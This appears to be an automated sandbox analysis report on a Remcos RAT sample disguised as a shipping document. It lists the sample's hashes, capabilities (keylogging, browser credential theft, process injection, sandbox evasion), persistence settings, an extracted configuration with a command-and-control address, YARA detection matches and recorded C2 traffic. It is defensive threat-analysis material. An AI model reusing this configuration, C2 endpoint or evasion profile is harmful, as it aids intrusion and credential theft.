Analysis Report: MV OLYMPIC PROGRESS VSL PARTICULARS.exe

Overview

General Information

Sample Name: MV OLYMPIC PROGRESS VSL PARTICULARS.exe
Analysis ID: 422673
MD5: 6fb384af6e5fd9d345650e37b1b58098
SHA1: d4094353b97c47f35057a343049e854ddc01d90d
SHA256: fc08a11aa7b0c98831ecbfff1742a3099466919e12ce8169639ec1cdefb5e2c3
Tags: exe, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Process Tree

  • System is w10x64
  • MV OLYMPIC PROGRESS VSL PARTICULARS.exe (PID: 2584 cmdline: 'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • MV OLYMPIC PROGRESS VSL PARTICULARS.exe (PID: 5888 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
      • cmd.exe (PID: 5472 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 1020 cmdline: PING 127.0.0.1 -n 2 MD5: 70C24A306F768936563ABDADB9CA9108)
        • svchosts.exe (PID: 4300 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
          • svchosts.exe (PID: 6060 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
          • svchosts.exe (PID: 1632 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • svchosts.exe (PID: 2420 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • svchosts.exe (PID: 5020 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • svchosts.exe (PID: 6932 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • svchosts.exe (PID: 4936 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "185.244.26.244:5888:pass|", "Assigned name": "Host", "Connect interval": "5", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "svchosts.exe", "Startup value": "remcos", "Hide file": "Enable", "Mutex": "remcos_lfqwkauxufogluh", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "remcos"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | Remcos_1 | Remcos Payload | kevoreilly
  • 0x11034:$name: Remcos
  • 0x118a8:$name: Remcos
  • 0x118fb:$name: REMCOS
  • 0x10688:$time: %02i:%02i:%02i:%03i
  • 0x11320:$time: %02i:%02i:%02i:%03i
  • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 ...
00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | Remcos | detect Remcos in memory | JPCERT/CC Incident Response Group
  • 0x11034:$remcos: Remcos
  • 0x118a8:$remcos: Remcos
  • 0x118e0:$url: Breaking-Security.Net
  • 0x160ea:$resource: SETTINGS
00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x114dc:$funcs1: autogetofflinelogs
  • 0x114c0:$funcs2: clearlogins
  • 0x114f0:$funcs3: getofflinelogs
  • 0x11578:$funcs4: execcom
  • 0x114cc:$funcs5: deletekeylog
  • 0x11798:$funcs6: remscriptexecd
  • 0x115bc:$funcs7: getwindows
  • 0x10da0:$funcs8: fundlldata
  • 0x10d78:$funcs9: getfunlib
  • 0x107ec:$funcs10: autofflinelogs
  • 0x113b8:$funcs11: getclipboard
  • 0x114b4:$funcs12: getscrslist
  • 0x107e0:$funcs13: offlinelogs
  • 0x105c8:$funcs14: getcamsingleframe
  • 0x116e4:$funcs15: listfiles
  • 0x115e0:$funcs16: getproclist
  • 0x10828:$funcs17: onlinelogs
  • 0x11700:$funcs18: getdrives
  • 0x11784:$funcs19: remscriptsuccess
  • 0x10600:$funcs20: getcamframe
  • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(39 further memory-dump matches not shown in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
36.2.svchosts.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
36.2.svchosts.exe.400000.0.raw.unpack | Remcos_1 | Remcos Payload | kevoreilly
  • 0x11034:$name: Remcos
  • 0x118a8:$name: Remcos
  • 0x118fb:$name: REMCOS
  • 0x10688:$time: %02i:%02i:%02i:%03i
  • 0x11320:$time: %02i:%02i:%02i:%03i
  • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 ...
36.2.svchosts.exe.400000.0.raw.unpack | Remcos | detect Remcos in memory | JPCERT/CC Incident Response Group
  • 0x11034:$remcos: Remcos
  • 0x118a8:$remcos: Remcos
  • 0x118e0:$url: Breaking-Security.Net
  • 0x160ea:$resource: SETTINGS
36.2.svchosts.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x114dc:$funcs1: autogetofflinelogs
  • 0x114c0:$funcs2: clearlogins
  • 0x114f0:$funcs3: getofflinelogs
  • 0x11578:$funcs4: execcom
  • 0x114cc:$funcs5: deletekeylog
  • 0x11798:$funcs6: remscriptexecd
  • 0x115bc:$funcs7: getwindows
  • 0x10da0:$funcs8: fundlldata
  • 0x10d78:$funcs9: getfunlib
  • 0x107ec:$funcs10: autofflinelogs
  • 0x113b8:$funcs11: getclipboard
  • 0x114b4:$funcs12: getscrslist
  • 0x107e0:$funcs13: offlinelogs
  • 0x105c8:$funcs14: getcamsingleframe
  • 0x116e4:$funcs15: listfiles
  • 0x115e0:$funcs16: getproclist
  • 0x10828:$funcs17: onlinelogs
  • 0x11700:$funcs18: getdrives
  • 0x11784:$funcs19: remscriptsuccess
  • 0x10600:$funcs20: getcamframe
  • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
36.2.svchosts.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(58 further unpacked-PE matches not shown in this extract)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack Malware Configuration Extractor: Remcos (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe ReversingLabs: Detection: 86%
Multi AV Scanner detection for submitted file
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe Virustotal: Detection: 71%
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe Metadefender: Detection: 34%
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe ReversingLabs: Detection: 86%
Yara detected Remcos RAT
Source: Yara match File source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 1632, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 5020, type: MEMORY
Source: Yara match File source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
Source: Yara match File source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 5888, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
Source: Yara match File source: Process Memory Space: svchosts.exe PID: 4936, type: MEMORY
Source: Yara match File source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe Joe Sandbox ML: detected
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function 17_2_0040F234: SetFileAttributesA, FindFirstFileA, FindNextFileA, RemoveDirectoryA, SetFileAttributesA, DeleteFileA, GetLastError, FindClose, RemoveDirectoryA, FindClose
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_00405AFB
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_
traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c17_2_0040A71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std
@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_004057B6
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?17_2_0040BEA2

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor URLs: 185.244.26.244
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: global traffic TCP traffic: 192.168.2.3:49739 -> 185.244.26.244:5888
          Source: Joe Sandbox View IP Address: 185.244.26.244 185.244.26.244
          Source: Joe Sandbox View ASN Name: VAMU-ASIP-TRANSITVAMURU VAMU-ASIP-TRANSITVAMURU
          Source: unknown TCP traffic detected without corresponding DNS query: 185.244.26.244
